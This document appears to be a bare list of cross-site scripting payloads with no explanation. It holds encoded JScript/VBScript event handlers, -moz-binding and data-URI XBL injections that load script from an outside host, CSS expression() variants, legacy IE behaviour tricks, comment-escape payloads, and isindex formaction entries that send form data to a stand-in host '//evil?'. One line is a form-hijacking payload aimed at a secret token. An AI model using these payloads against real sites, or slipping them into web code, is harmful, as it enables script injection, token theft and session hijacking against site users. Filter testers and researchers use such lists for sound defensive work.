<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<iframe onload=VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@> <iframe language=VBScript.Encode onload=#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@>
<a title="&{alert(1)}">XSS</a>
<link href="xss.js" rel=stylesheet type="text/javascript">
<form><button name=x formaction=x><b>stealme
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-\mo\z-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab s/xbl/xbl.xml#xss)">
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22 http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js %22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20 document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/ binding%3E%3C/bindings%3E)" />
<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\6e(alert(1))>
<div style=xss=expression(alert(1))> <div style="color=red">test</div>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
<script> function window.onload(){ alert(1); } </script> <script> function window::onload(){ alert(1); } </script> <script> function window.location(){ } </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; } </script> </body>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
<a href="javascriptjavascript:alert(1)">Firefox</a>
<a href="javascript:alert(1)">Firefox</a>
<!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
<svg><xss onload=alert(1)>
<isindex type=image src="//evil?
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
<isindex type=submit formaction=javascript:alert(1)>
<isindex type=submit action=javascript:alert(1)>